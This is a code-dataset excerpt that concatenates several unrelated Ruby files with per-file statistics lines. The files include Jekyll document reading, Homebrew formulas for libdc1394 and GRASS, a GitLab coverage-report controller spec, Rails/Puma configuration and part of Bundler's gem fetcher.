merge_data!({ "categories" => superdirs }, :source => "file path")
end
def populate_categories
merge_data!({
"categories" => (
Array(data["categories"]) + Utils.pluralized_array_from_hash(
data,
"category",
"categories"
)
).map(&:to_s).flatten.uniq,
})
end
def populate_tags
merge_data!({
"tags" => Utils.pluralized_array_from_hash(data, "tag", "tags").flatten,
})
end
private
def merge_categories!(other)
if other.key?("categories") && !other["categories"].nil?
if other["categories"].is_a?(String)
other["categories"] = other["categories"].split(%r!\s+!).map(&:strip)
end
other["categories"] = (data["categories"] || []) | other["categories"]
end
end
private
def merge_date!(source)
if data.key?("date") && !data["date"].is_a?(Time)
data["date"] = Utils.parse_date(
data["date"].to_s,
"Document '#{relative_path}' does not have a valid date in the #{source}."
)
end
end
private
def merge_defaults
defaults = @site.frontmatter_defaults.all(
relative_path,
collection.label.to_sym
)
merge_data!(defaults, :source => "front matter defaults") unless defaults.empty?
end
private
def read_content(opts)
self.content = File.read(path, Utils.merged_file_read_opts(site, opts))
if content =~ YAML_FRONT_MATTER_REGEXP
self.content = $POSTMATCH
data_file = SafeYAML.load(Regexp.last_match(1))
merge_data!(data_file, :source => "YAML front matter") if data_file
end
end
private
def read_post_data
populate_title
populate_categories
populate_tags
generate_excerpt
end
private
def handle_read_error(error)
if error.is_a? SyntaxError
Jekyll.logger.error "Error:", "YAML Exception reading #{path}: #{error.message}"
else
Jekyll.logger.error "Error:", "could not read file #{path}: #{error.message}"
end
if site.config["strict_front_matter"] || error.is_a?(Jekyll::Errors::FatalException)
raise error
end
end
private
def populate_title
if relative_path =~ DATE_FILENAME_MATCHER
date, slug, ext = Regexp.last_match.captures
modify_date(date)
elsif relative_path =~ DATELESS_FILENAME_MATCHER
slug, ext = Regexp.last_match.captures
end
# Try to ensure the user gets a title.
data["title"] ||= Utils.titleize_slug(slug)
# Only overwrite slug & ext if they aren't specified.
data["slug"] ||= slug
data["ext"] ||= ext
end
private
def modify_date(date)
if !data["date"] || data["date"].to_i == site.time.to_i
merge_data!({ "date" => date }, :source => "filename")
end
end
private
def generate_excerpt
if generate_excerpt?
data["excerpt"] ||= Jekyll::Excerpt.new(self)
end
end
end
end
| 29.379921 | 90 | 0.629012 |
263f51123fba4287457b3ee2829bc951e4f1d323 | 2,102 | class Libdc1394 < Formula
desc "Provides API for IEEE 1394 cameras"
homepage "https://damien.douxchamps.net/ieee1394/libdc1394/"
license "LGPL-2.1"
stable do
url "https://downloads.sourceforge.net/project/libdc1394/libdc1394-2/2.2.6/libdc1394-2.2.6.tar.gz"
sha256 "2b905fc9aa4eec6bdcf6a2ae5f5ba021232739f5be047dec8fe8dd6049c10fed"
# fix issue due to bug in OSX Firewire stack
# libdc1394 author comments here:
# https://permalink.gmane.org/gmane.comp.multimedia.libdc1394.devel/517
patch do
url "https://raw.githubusercontent.com/Homebrew/formula-patches/b8275aa07f/libdc1394/capture.patch"
sha256 "6e3675b7fb1711c5d7634a76d723ff25e2f7ae73cd1fbf3c4e49ba8e5dcf6c39"
end
end
bottle do
sha256 cellar: :any, arm64_big_sur: "8af168268139e714a725ab1d4384a34ef092a3e50e081baba66fdf583fef3711"
sha256 cellar: :any, big_sur: "7eef59a97b33666b144d68181b081eba93c4c23c58f159a67684d2ed2d043080"
sha256 cellar: :any, catalina: "57080908a5da9abb2c0d83d4ad25450a507de8140a812112d9e5751f4004e4d0"
sha256 cellar: :any, mojave: "6cf02c5500f83fa2ccd1ff9b880f44f9652d68b0e90a2345d6c62fb92a988f0a"
sha256 cellar: :any, high_sierra: "536cbd34a43886d63a3dba41e7877ed63ad0fbe1a5e21cde499bd2c9e1e37e52"
sha256 cellar: :any, sierra: "ff1d7c6b07f21d8cd485574b10091eb21c2316390a7d4cfa84d29cccce8097e6"
sha256 cellar: :any, x86_64_linux: "23d63fc6cb173b5a3028d1a94a62db68f3c0eac53bbd707ff4419e96abc12937"
end
head do
url "https://git.code.sf.net/p/libdc1394/code.git"
depends_on "autoconf" => :build
depends_on "automake" => :build
depends_on "libtool" => :build
depends_on "pkg-config" => :build
depends_on "libusb"
end
depends_on "sdl"
def install
Dir.chdir("libdc1394") if build.head?
system "autoreconf", "-i", "-s" if build.head?
system "./configure", "--disable-dependency-tracking",
"--prefix=#{prefix}",
"--disable-examples",
"--disable-sdltest"
system "make", "install"
end
end
| 42.04 | 106 | 0.724072 |
878f647d46f91c18f588af91dc7e8bee0b21efab | 439 | class CreateEgotterFollowerWorker
include Sidekiq::Worker
sidekiq_options queue: 'creating_high', retry: 0, backtrace: false
def perform(user_id)
user = User.find(user_id)
unless EgotterFollower.exists?(uid: user.uid)
EgotterFollower.create!(uid: user.uid, screen_name: user.screen_name)
end
rescue ActiveRecord::RecordNotUnique => e
rescue => e
logger.warn "#{e.class}: #{e.message} #{user_id}"
end
end
| 29.266667 | 75 | 0.719818 |
e2e851194abf89943c44eea36156cfc81e228dd5 | 6,132 | module Ziya::Gauges
class Base
include Ziya::Helpers::BaseHelper
attr_accessor :license, :design_id
attr_reader :type, :components
attr_reader :options
def initialize( license, design_id )
@license = license
@design_id = design_id
# load up associated helper
loaded = load_helper( Ziya.helpers_dir ) if Ziya.helpers_dir
Ziya.logger.warn( ">>> ZiYa -- no helper for gauge `#{design_id}" ) unless loaded
# init defaults
@options = default_options
end
# -------------------------------------------------------------------------
# provides for overiding basic functionality
#
# <tt>gauge_color</tt>:: Legend color
# <tt>legend_color</tt>:: Gauge color
def set_preferences( opts={} )
options.merge!( opts )
end
# -------------------------------------------------------------------------
# render gauge to xml
def to_xml
render_xml
end
# =========================================================================
protected
# inject update behavior
def render_extra_components
if options[:url]
Ziya::Gauges::Support::Update.new(
:url => options[:url],
:retry => options[:retry] || 0,
:timeout => options[:timeout] || 30,
:delay_type => options[:delay_type] || 1,
:delay => options[:delay] || 30 ).flatten( @xml )
end
end
# -------------------------------------------------------------------------
# setup thermometer default options
def default_options
{
:x => 20,
:y => 20,
:gauge_color => "ff0000",
:legend_color => "cc0000",
}
end
# =========================================================================
private
# retrieve bundled design directory
def bundled_designs_dir
Ziya.path( %w[gauges designs] )
end
# -----------------------------------------------------------------------
# Load up ERB style helpers
def load_helper( helper_dir )
Dir.foreach(helper_dir) do |helper_file|
unless helper_file =~ /^(#{design_id}_helper).rb$/ or helper_file =~ /^(base_helper).rb$/
next
end
Ziya.logger.info( ">>> ZiYa loading custom helper `#{$1}" )
# BOZO !! This will only work in rails ??
if defined? RAILS_ROOT
require_dependency File.join(helper_dir, $1)
else
require File.join(helper_dir, $1)
end
helper_module_name = "Ziya::" + $1.gsub(/(^|_)(.)/) { $2.upcase }
# helper_module_name = $1.to_s.gsub(/\/(.?)/) { "::" + $1.upcase }.gsub(/(^|_)(.)/) { $2.upcase }
Ziya.logger.debug( "Include module #{helper_module_name}")
Ziya::Gauges::Base.class_eval("include #{helper_module_name}")
true
end
false
end
# -----------------------------------------------------------------------
# merge components with user overrides
def merge_comps( original, override )
override.each do |k,v|
if original.has_key? k
original[k] = v
else
original << [k,v]
end
end
end
# -----------------------------------------------------------------------
# renders design components
def render_components
# First check bundled design dir for std design
std_design = inflate( self, bundled_designs_dir, design_id )
# Now check for user overrides
usr_design = inflate( self, Ziya.designs_dir, design_id )
design = usr_design
if std_design and usr_design
design = std_design
merge_comps( design.components, usr_design.components )
# design.components.merge!( usr_design.components )
elsif std_design
design = std_design
end
# Ziya.logger.debug "!!!! Design\n#{design.to_yaml}"
# flatten components to xml
design.components.each do |name, value|
# Ziya.logger.debug "Processing #{name}"
value.flatten( @xml )
end
end
# -----------------------------------------------------------------------
# renders chart to xml
def render_xml
@xml = Builder::XmlMarkup.new
@xml.gauge do
@xml.license( @license ) unless @license.nil?
render_extra_components
render_components
end
@xml.to_s.gsub( /<to_s\/>/, '' )
end
# -----------------------------------------------------------------------
# Parse erb template if any
def erb_render( yml )
# b = binding
ERB.new( yml ).result binding
end
# -----------------------------------------------------------------------
# Load yaml file associated with class if any
def inflate( clazz, designs_dir, design )
class_name = underscore( demodulize( clazz.to_s ) )
begin
file_name = "#{designs_dir}/#{design}.yml"
Ziya.logger.debug ">>> ZiYa attempt to load design file '#{file_name}"
return nil unless File.exists?( file_name )
yml = IO.read( file_name )
# Ziya.logger.debug ">>> Unprocessed yaml...\n#{yml}\n"
processed = erb_render( yml )
# Ziya.logger.debug ">>> Processed yaml...\n#{processed}"
load = YAML::load( processed )
Ziya.logger.info ">>> ZiYa successfully loaded design file `#{file_name}"
return load
rescue SystemCallError => boom
Ziya.logger.error boom
rescue => bang
Ziya.logger.error ">>> ZiYa -- Error encountered loading design file `#{file_name} -- #{bang}"
bang.backtrace.each { |l| Ziya.logger.error( l ) }
end
nil
end
end
end | 35.651163 | 107 | 0.466243 |
b95ed7de29efd567308fae6314725c6ba5d3cdf2 | 1,530 | # encoding: utf-8
# CarrierWave uploader for picture attachments. Stores files on the local
# filesystem under a per-model/per-record directory and restricts uploads
# to common image extensions.
class PictureUploader < CarrierWave::Uploader::Base
  # Include RMagick or MiniMagick support:
  # include CarrierWave::RMagick
  # include CarrierWave::MiniMagick
  # Choose what kind of storage to use for this uploader:
  storage :file
  # storage :fog
  # Override the directory where uploaded files will be stored.
  # This is a sensible default for uploaders that are meant to be mounted:
  # e.g. "uploads/user/picture/42" for User#picture with id 42.
  def store_dir
    "uploads/#{model.class.to_s.underscore}/#{mounted_as}/#{model.id}"
  end
  # Provide a default URL as a default if there hasn't been a file uploaded:
  # def default_url
  #   # For Rails 3.1+ asset pipeline compatibility:
  #   # ActionController::Base.helpers.asset_path("fallback/" + [version_name, "default.png"].compact.join('_'))
  #
  #   "/images/fallback/" + [version_name, "default.png"].compact.join('_')
  # end
  # Process files as they are uploaded:
  # process :scale => [200, 300]
  #
  # def scale(width, height)
  #   # do something
  # end
  # Create different versions of your uploaded files:
  # version :thumb do
  #   process :resize_to_fit => [50, 50]
  # end
  # Add a white list of extensions which are allowed to be uploaded.
  # For images you might use something like this:
  # Whitelist of permitted image types for upload.
  # NOTE(review): newer CarrierWave versions renamed this hook to
  # extension_allowlist -- confirm against the bundled gem version.
  def extension_white_list
    %w(jpg jpeg gif png)
  end
  # Override the filename of the uploaded files:
  # Avoid using model.id or version_name here, see uploader/store.rb for details.
  # def filename
  #   "something.jpg" if original_filename
  # end
end
| 28.867925 | 112 | 0.699346 |
f880984a85da31676578a91267dc81ff3cc31ccb | 3,572 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Groups::Analytics::CoverageReportsController do
let_it_be(:user) { create(:user) }
let_it_be(:group) { create(:group) }
let_it_be(:project) { create(:project, namespace: group) }
let_it_be(:ref_path) { 'refs/heads/master' }
let_it_be(:first_coverage) { create_daily_coverage('rspec', project, 79.0, '2020-03-09', group) }
let_it_be(:last_coverage) { create_daily_coverage('karma', project, 95.0, '2020-03-10', group) }
let_it_be(:valid_request_params) do
{
group_id: group.name,
start_date: '2020-03-01',
end_date: '2020-03-31',
ref_path: ref_path,
format: :csv
}
end
before do
sign_in(user)
end
context 'without permissions' do
describe 'GET index' do
it 'responds 403' do
get :index, params: valid_request_params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
context 'with permissions' do
before do
group.add_owner(user)
end
context 'without a license' do
before do
stub_licensed_features(group_coverage_reports: false)
end
describe 'GET index' do
it 'responds 403 because the feature is not licensed' do
get :index, params: valid_request_params
expect(response).to have_gitlab_http_status(:forbidden)
end
end
end
describe 'GET index' do
before do
stub_licensed_features(group_coverage_reports: true)
end
it 'responds 200 with CSV coverage data', :snowplow do
get :index, params: valid_request_params
expect_snowplow_event(
category: described_class.name,
action: 'download_code_coverage_csv',
label: 'group_id',
value: group.id
)
expect(response).to have_gitlab_http_status(:ok)
expect(csv_response).to eq([
%w[date group_name project_name coverage],
[last_coverage.date.to_s, last_coverage.group_name, project.name, last_coverage.data['coverage'].to_s],
[first_coverage.date.to_s, first_coverage.group_name, project.name, first_coverage.data['coverage'].to_s]
])
end
context 'when ref_path is nil' do
let(:ref_path) { nil }
it 'responds HTTP 200' do
get :index, params: valid_request_params
expect(response).to have_gitlab_http_status(:ok)
expect(csv_response.size).to eq(3)
end
end
it 'executes the same number of queries regardless of the number of records returned' do
control = ActiveRecord::QueryRecorder.new do
get :index, params: valid_request_params
end
expect(CSV.parse(response.body).length).to eq(3)
create_daily_coverage('rspec', project, 79.0, '2020-03-10', group)
expect { get :index, params: valid_request_params }.not_to exceed_query_limit(control)
expect(csv_response.length).to eq(4)
end
context 'with an invalid format' do
it 'responds 404' do
get :index, params: valid_request_params.merge(format: :json)
expect(response).to have_gitlab_http_status(:not_found)
end
end
end
end
private
def create_daily_coverage(group_name, project, coverage, date, group = nil)
create(
:ci_daily_build_group_report_result,
project: project,
ref_path: ref_path,
group_name: group_name,
data: { 'coverage' => coverage },
date: date,
group: group
)
end
end
| 27.689922 | 115 | 0.650616 |
7a8e33fad7852d2b7dbd9b918c24f91be729fa48 | 643 |
# encoding: UTF-8
module Axlsx
  # An override content part. These parts are created automatically for you
  # based on the contents of your package.
  class Override < AbstractContentType
    # Node name used when this object is serialized to XML.
    NODE_NAME = 'Override'

    # The name and location of the part.
    # @return [String]
    attr_reader :part_name
    alias :PartName :part_name

    # Sets the name and location of the part, validating it is a string.
    def part_name=(v)
      Axlsx.validate_string v
      @part_name = v
    end
    alias :PartName= :part_name=

    # Serializes this object to xml.
    def to_xml_string(str = '')
      super(NODE_NAME, str)
    end
  end
end
| 24.730769 | 116 | 0.692068 |
6a5c3ace72a8865d189dc2f67fce77f2cae2b339 | 5,545 | require 'formula'
# Homebrew formula for GRASS GIS 6.4. Builds the command-line tools always;
# the WxPython GUI is skipped on Lion or when --without-gui is given.
class Grass < Formula
  homepage 'http://grass.osgeo.org/'
  url 'http://grass.osgeo.org/grass64/source/grass-6.4.2.tar.gz'
  sha1 '74481611573677d90ae0cd446c04a3895e232004'
  head 'https://svn.osgeo.org/grass/grass/trunk'
  option "without-gui", "Build without WxPython interface. Command line tools still available."
  depends_on "pkg-config" => :build
  depends_on :python
  depends_on "gettext"
  depends_on "readline"
  depends_on "gdal"
  depends_on "libtiff"
  depends_on "unixodbc"
  depends_on "fftw"
  depends_on 'wxmac' => :recommended # prefer over OS X's version because of 64bit
  depends_on :postgresql => :optional
  depends_on :mysql => :optional
  depends_on "cairo" if MacOS.version == :leopard
  depends_on :x11 # needs to find at least X11/include/GL/gl.h
  # Patches that files are not installed outside of the prefix.
  def patches; DATA; end
  fails_with :clang do
    cause "Multiple build failures while compiling GRASS tools."
  end
  # True when the WxPython GUI should be skipped entirely.
  def headless?
    # The GRASS GUI is based on WxPython. Unfortunately, Lion does not include
    # this module so we have to drop it.
    build.include? 'without-gui' or MacOS.version == :lion
  end
  def install
    readline = Formula.factory('readline')
    gettext = Formula.factory('gettext')
    args = [
      "--disable-debug", "--disable-dependency-tracking",
      "--enable-largefile",
      "--enable-shared",
      "--with-cxx",
      "--without-motif",
      "--with-python",
      "--with-blas",
      "--with-lapack",
      "--with-sqlite",
      "--with-odbc",
      "--with-geos=#{Formula.factory('geos').opt_prefix}/bin/geos-config",
      "--with-png",
      "--with-readline-includes=#{readline.opt_prefix}/include",
      "--with-readline-libs=#{readline.opt_prefix}/lib",
      "--with-readline",
      "--with-nls-includes=#{gettext.opt_prefix}/include",
      "--with-nls-libs=#{gettext.opt_prefix}/lib",
      "--with-nls",
      "--with-freetype",
      "--without-tcltk" # Disabled due to compatibility issues with OS X Tcl/Tk
    ]
    unless MacOS::CLT.installed?
      # On Xcode-only systems (without the CLT), we have to help:
      args << "--with-macosx-sdk=#{MacOS.sdk_path}"
      args << "--with-opengl-includes=#{MacOS.sdk_path}/System/Library/Frameworks/OpenGL.framework/Headers"
    end
    if headless? or build.without? 'wxmac'
      args << "--without-wxwidgets"
    else
      args << "--with-wxwidgets=#{Formula.factory('wxmac').opt_prefix}/bin/wx-config"
    end
    if MacOS.prefer_64_bit?
      args << "--enable-64bit"
      args << "--with-macosx-archs=x86_64"
    else
      args << "--with-macosx-archs=i386"
    end
    # Deal with Cairo support
    if MacOS.version == :leopard
      cairo = Formula.factory('cairo')
      args << "--with-cairo-includes=#{cairo.include}/cairo"
      args << "--with-cairo-libs=#{cairo.lib}"
    else
      args << "--with-cairo-includes=#{MacOS::X11.include} #{MacOS::X11.include}/cairo"
    end
    args << "--with-cairo"
    # Database support
    if build.with? "postgres"
      args << "--with-postgres"
    end
    if build.with? "mysql"
      mysql = Formula.factory('mysql')
      args << "--with-mysql-includes=#{mysql.include + 'mysql'}"
      args << "--with-mysql-libs=#{mysql.lib + 'mysql'}"
      args << "--with-mysql"
    end
    system "./configure", "--prefix=#{prefix}", *args
    system "make" # make and make install must be separate steps.
    system "make install"
  end
  def caveats
    if headless?
      <<-EOS.undent
        This build of GRASS has been compiled without the WxPython GUI. This is
        done by default on Lion because there is no stable build of WxPython
        available to compile against.

        The command line tools remain fully functional.
        EOS
    elsif MacOS.version < :lion
      # On Lion or above, we are very happy with our brewed wxwidgets.
      <<-EOS.undent
        GRASS is currently in a transition period with respect to GUI support.
        The old Tcl/Tk GUI cannot be built using the version of Tcl/Tk provided
        by OS X. This has the unfortunate consequence of disabling the NVIZ
        visualization system. A keg-only Tcl/Tk brew or some deep hackery of
        the GRASS source may be possible ways to get around this.

        Tcl/Tk will eventually be deprecated in GRASS 7 and this version has
        been built to support the newer wxPython based GUI. However, there is
        a problem as wxWidgets does not compile as a 64 bit library on OS X
        which affects Snow Leopard users. In order to remedy this, the GRASS
        startup script:

          #{prefix}/grass-#{version}/etc/Init.sh

        has been modified to use the OS X system Python and to start it in 32 bit mode.
      EOS
    end
  end
end
__END__
Remove two lines of the Makefile that try to install stuff to
/Library/Documentation---which is outside of the prefix and usually fails due
to permissions issues.
diff --git a/Makefile b/Makefile
index f1edea6..be404b0 100644
--- a/Makefile
+++ b/Makefile
@@ -304,8 +304,6 @@ ifeq ($(strip $(MINGW)),)
-tar cBf - gem/skeleton | (cd ${INST_DIR}/etc ; tar xBf - ) 2>/dev/null
-${INSTALL} gem/gem$(GRASS_VERSION_MAJOR)$(GRASS_VERSION_MINOR) ${BINDIR} 2>/dev/null
endif
- @# enable OSX Help Viewer
- @if [ "`cat include/Make/Platform.make | grep -i '^ARCH.*darwin'`" ] ; then /bin/ln -sfh "${INST_DIR}/docs/html" /Library/Documentation/Help/GRASS-${GRASS_VERSION_MAJOR}.${GRASS_VERSION_MINOR} ; fi
install-strip: FORCE
| 34.018405 | 199 | 0.656988 |
bbab55b6d2aafc1c9b3f1d256b8be7a6b9ab71f6 | 2,000 | # Puma can serve each request in a thread from an internal thread pool.
# The `threads` method setting takes two numbers a minimum and maximum.
# Any libraries that use thread pools should be configured to match
# the maximum value specified for Puma. Default is set to 5 threads for minimum
# and maximum, this matches the default thread size of Active Record.
#
threads_count = ENV.fetch('RAILS_MAX_THREADS', 2).to_i
threads threads_count, threads_count
# Specifies the `port` that Puma will listen on to receive requests, default is 3000.
#
port ENV.fetch('PORT', 3000), '0.0.0.0'
# Specifies the `environment` that Puma will run in.
#
environment ENV.fetch('RAILS_ENV', 'development')
# Specifies the number of `workers` to boot in clustered mode.
# Workers are forked webserver processes. If using threads and workers together
# the concurrency of the application would be max `threads` * `workers`.
# Workers do not work on JRuby or Windows (both of which do not support
# processes).
#
# workers ENV.fetch('WEB_CONCURRENCY') { 2 }
# Use the `preload_app!` method when specifying a `workers` number.
# This directive tells Puma to first boot the application and load code
# before forking the application. This takes advantage of Copy On Write
# process behavior so workers use less memory. If you use this option
# you need to make sure to reconnect any threads in the `on_worker_boot`
# block.
#
# preload_app!
# The code in the `on_worker_boot` will be called if you are using
# clustered mode by specifying a number of `workers`. After each worker
# process is booted this block will be run, if you are using `preload_app!`
# option you will want to use this block to reconnect to any threads
# or connections that may have been created at application boot, Ruby
# cannot share connections between processes.
#
# on_worker_boot do
# ActiveRecord::Base.establish_connection if defined?(ActiveRecord)
# end
# Allow puma to be restarted by `rails restart` command.
plugin :tmp_restart
| 41.666667 | 85 | 0.768 |
01f9d7c63f8bf4f02185e6636ab7ec7163697037 | 1,107 | require 'rspec'
require 'bosh/dev/ruby_version'
# Rake tasks that run BOSH test suites remotely via Concourse `fly execute`.
namespace :fly do
  # bundle exec rake fly:unit
  desc 'Fly unit specs'
  task :unit do
    execute('test-unit')
  end
  # bundle exec rake fly:integration
  desc 'Fly integration specs'
  task :integration do
    env(DB: (ENV['DB'] || 'postgresql'))
    execute('test-integration', '-p')
  end
  # bundle exec rake fly:run["pwd ; ls -al"]
  task :run, [:command] do |_, args|
    env(COMMAND: %Q|\"#{args[:command]}\"|)
    execute('run', '-p')
  end
  private
  # Returns the `-t <target>` flag when CONCOURSE_TARGET is set, else nil.
  # NOTE(review): `private` and these `def`s are evaluated at the top level,
  # so the helpers are not actually scoped to this namespace.
  def concourse_target
    "-t #{ENV['CONCOURSE_TARGET']}" if ENV.has_key?('CONCOURSE_TARGET')
  end
  # Accumulates KEY=VALUE pairs (memoized across calls within one rake run)
  # and returns them as a single space-separated string.
  def env(modifications = {})
    @env ||= {
      RUBY_VERSION: ENV['RUBY_VERSION'] || Bosh::Dev::RubyVersion.release_version
    }
    @env.merge!(modifications) if modifications
    @env.to_a.map { |pair| pair.join('=') }.join(' ')
  end
  # Shells out to `fly execute` with the task config for +task+.
  def execute(task, command_options = nil)
    sh("#{env} fly #{concourse_target} execute #{command_options} -x -c ci/tasks/#{task}.yml -i bosh-src=$PWD")
  end
end
desc 'Fly unit and integration specs'
task :fly => %w(fly:unit fly:integration)
| 24.065217 | 111 | 0.64047 |
e84aa620baabab8e02b146f8bd4b94d26c371664 | 704 | # frozen_string_literal: true
require "spec_helper"
# Integration spec: AttrFilters::ActiveModel filters run during AR validation.
# Only executed when ActiveRecord is available (see the `if:` guard).
RSpec.describe "ActiveRecord integration using AttrFilters::ActiveModel", if: active_record? do
  context "attributes lazy loading" do
    it "should success add filter to an attribute" do
      # In-memory SQLite keeps the example self-contained and fast.
      ActiveRecord::Base.establish_connection(
        adapter: "sqlite3",
        database: ":memory:"
      )
      ActiveRecord::Base.connection.execute(%(CREATE TABLE IF NOT EXISTS users (name TEXT, age INT);))
      # NOTE(review): defining the class inside the example leaks ::User into
      # the global namespace for the rest of the suite.
      class User < ActiveRecord::Base
        include AttrFilters::ActiveModel
        filters :name, trim: true
      end
      user = User.new(name: " Mike Dou")
      # Filters are applied as part of validation; trim strips the leading space.
      user.valid?
      expect(user.name).to eq("Mike Dou")
    end
  end
end
| 27.076923 | 102 | 0.669034 |
083c7a5a7db7969e19ea93cddfce324e6fd039b6 | 719 | # coding: utf-8
# Gem specification for the jekyll-athena theme gem.
Gem::Specification.new do |spec|
  spec.name          = "jekyll-athena"
  spec.version       = "0.0.2"
  spec.authors       = ["broccolini"]
  spec.email         = ["[email protected]"]
  spec.summary       = %q{A simple and elegant theme for Jekyll and GitHub Pages.}
  spec.homepage      = "https://audiosutta.github.io/athena"
  spec.license       = "MIT"
  # Ship only theme assets, layouts/includes/sass, and license/readme files
  # (null-separated `git ls-files -z` handles names with spaces safely).
  spec.files         = `git ls-files -z`.split("\x0").select do |f|
    f.match(%r{^(assets|_(includes|layouts|sass)/|(LICENSE|README)((\.(txt|md|markdown)|$)))}i)
  end
  spec.add_development_dependency "jekyll", "~> 3.2"
  spec.add_development_dependency "bundler", "~> 1.12"
  spec.add_development_dependency "rake", "~> 10.0"
end
| 34.238095 | 95 | 0.623088 |
627d7d4adea49b3452aec0f32518969ab3420dbf | 11,242 | require 'bundler/vendored_persistent'
module Bundler
  # Handles all the fetching with the rubygems server
  class Fetcher
    # This error is raised if the API returns a 413 (only printed in verbose)
    class FallbackError < HTTPError; end
    # This is the error raised if OpenSSL fails the cert verification
    class CertificateFailureError < HTTPError
      def initialize(remote_uri)
        super "Could not verify the SSL certificate for #{remote_uri}.\nThere" \
          " is a chance you are experiencing a man-in-the-middle attack, but" \
          " most likely your system doesn't have the CA certificates needed" \
          " for verification. For information about OpenSSL certificates, see" \
          " bit.ly/ruby-ssl. To connect without using SSL, edit your Gemfile" \
          " sources and change 'https' to 'http'."
      end
    end
    # This is the error raised when a source is HTTPS and OpenSSL didn't load
    class SSLError < HTTPError
      def initialize(msg = nil)
        super msg || "Could not load OpenSSL.\n" \
            "You must recompile Ruby with OpenSSL support or change the sources in your " \
            "Gemfile from 'https' to 'http'. Instructions for compiling with OpenSSL " \
            "using RVM are available at rvm.io/packages/openssl."
      end
    end

    class << self
      attr_accessor :disable_endpoint, :api_timeout, :redirect_limit, :max_retries

      # Maps spec full names to [spec, source uri] so remote specs can be
      # materialized later (see .fetch below).
      @@spec_fetch_map ||= {}

      # Downloads the gem for +spec+ (if it was registered during #specs)
      # and swaps the remote stub for the real, local specification.
      def fetch(spec)
        spec, uri = @@spec_fetch_map[spec.full_name]
        if spec
          path = download_gem_from_uri(spec, uri)
          s = Bundler.rubygems.spec_from_gem(path, Bundler.settings["trust-policy"])
          spec.__swap__(s)
        end
      end

      # Downloads spec's gem file into the gem cache, going through a temp
      # dir + sudo move when the gem dir is not writable by the current user.
      def download_gem_from_uri(spec, uri)
        spec.fetch_platform
        download_path = Bundler.requires_sudo? ? Bundler.tmp : Bundler.rubygems.gem_dir
        gem_path = "#{Bundler.rubygems.gem_dir}/cache/#{spec.full_name}.gem"
        FileUtils.mkdir_p("#{download_path}/cache")
        Bundler.rubygems.download_gem(spec, uri, download_path)
        if Bundler.requires_sudo?
          Bundler.mkdir_p "#{Bundler.rubygems.gem_dir}/cache"
          Bundler.sudo "mv #{Bundler.tmp}/cache/#{spec.full_name}.gem #{gem_path}"
        end
        gem_path
      end
    end

    def initialize(remote_uri)
      # How many redirects to allow in one request
      @redirect_limit = 5
      # How long to wait for each gemcutter API call
      @api_timeout = 10
      # How many retries for the gemcutter API call
      @max_retries = 3

      @remote_uri = remote_uri
      @public_uri = remote_uri.dup
      @public_uri.user, @public_uri.password = nil, nil # don't print these
      if defined?(Net::HTTP::Persistent)
        @connection = Net::HTTP::Persistent.new 'bundler', :ENV
        @connection.verify_mode = (Bundler.settings[:ssl_verify_mode] ||
          OpenSSL::SSL::VERIFY_PEER)
        @connection.cert_store = bundler_cert_store
      else
        raise SSLError if @remote_uri.scheme == "https"
        @connection = Net::HTTP.new(@remote_uri.host, @remote_uri.port)
      end
      @connection.read_timeout = @api_timeout
      # NOTE: process-wide side effect; avoids slow reverse DNS lookups.
      Socket.do_not_reverse_lookup = true
    end

    # fetch a gem specification
    def fetch_spec(spec)
      spec = spec - [nil, 'ruby', '']
      spec_file_name = "#{spec.join '-'}.gemspec"
      uri = URI.parse("#{@remote_uri}#{Gem::MARSHAL_SPEC_DIR}#{spec_file_name}.rz")
      if uri.scheme == 'file'
        Bundler.load_marshal Gem.inflate(Gem.read_binary(uri.path))
      elsif cached_spec_path = gemspec_cached_path(spec_file_name)
        Bundler.load_gemspec(cached_spec_path)
      else
        Bundler.load_marshal Gem.inflate(fetch(uri))
      end
    rescue MarshalError
      raise HTTPError, "Gemspec #{spec} contained invalid data.\n" \
        "Your network or your gem server is probably having issues right now."
    end

    # cached gem specification path, if one exists
    def gemspec_cached_path(spec_file_name)
      paths = Bundler.rubygems.spec_cache_dirs.map { |dir| File.join(dir, spec_file_name) }
      paths = paths.select {|path| File.file? path }
      paths.first
    end

    # return the specs in the bundler format as an index
    def specs(gem_names, source)
      index = Index.new
      if gem_names && use_api
        Bundler.ui.info "Fetching gem metadata from #{@public_uri}", Bundler.ui.debug?
        specs = fetch_remote_specs(gem_names)
        # new line now that the dots are over
        Bundler.ui.info "" if specs && !Bundler.ui.debug?
      end

      if specs.nil?
        # API errors mean we should treat this as a non-API source
        @use_api = false
        Bundler.ui.info "Fetching source index from #{@public_uri}"
        specs = fetch_all_remote_specs
      end

      specs[@remote_uri].each do |name, version, platform, dependencies|
        next if name == 'bundler'
        spec = nil
        if dependencies
          spec = EndpointSpecification.new(name, version, platform, dependencies)
        else
          spec = RemoteSpecification.new(name, version, platform, self)
        end
        spec.source = source
        @@spec_fetch_map[spec.full_name] = [spec, @remote_uri]
        index << spec
      end
      index
    rescue CertificateFailureError => e
      Bundler.ui.info "" if gem_names && use_api # newline after dots
      raise e
    end

    # fetch index
    def fetch_remote_specs(gem_names, full_dependency_list = [], last_spec_list = [])
      query_list = gem_names - full_dependency_list

      # only display the message on the first run
      if Bundler.ui.debug?
        Bundler.ui.debug "Query List: #{query_list.inspect}"
      else
        Bundler.ui.info ".", false
      end

      return {@remote_uri => last_spec_list} if query_list.empty?

      spec_list, deps_list = fetch_dependency_remote_specs(query_list)
      returned_gems = spec_list.map {|spec| spec.first }.uniq

      fetch_remote_specs(deps_list, full_dependency_list + returned_gems, spec_list + last_spec_list)
    # fall back to the legacy index in the following cases
    # 1. Gemcutter Endpoint doesn't return a 200
    # 2. Marshal blob doesn't load properly
    # 3. One of the YAML gemspecs has the Syck::DefaultKey problem
    rescue HTTPError, MarshalError, GemspecError => e
      # new line now that the dots are over
      Bundler.ui.info "" unless Bundler.ui.debug?
      Bundler.ui.debug "Error during API request. #{e.class}: #{e.message}"
      Bundler.ui.debug e.backtrace.join(" ")

      @current_retries ||= 0
      if @current_retries < @max_retries
        @current_retries += 1
        retry
      end

      @use_api = false
      return nil
    end

    # Whether the dependency API endpoint should be used (memoized).
    def use_api
      return @use_api if defined?(@use_api)

      if @remote_uri.scheme == "file" || Bundler::Fetcher.disable_endpoint
        @use_api = false
      elsif fetch(dependency_api_uri)
        @use_api = true
      end
    rescue HTTPError
      @use_api = false
    end

    def inspect
      "#<#{self.class}:0x#{object_id} uri=#{@public_uri.to_s}>"
    end

    private

    HTTP_ERRORS = [
      Timeout::Error, EOFError, SocketError,
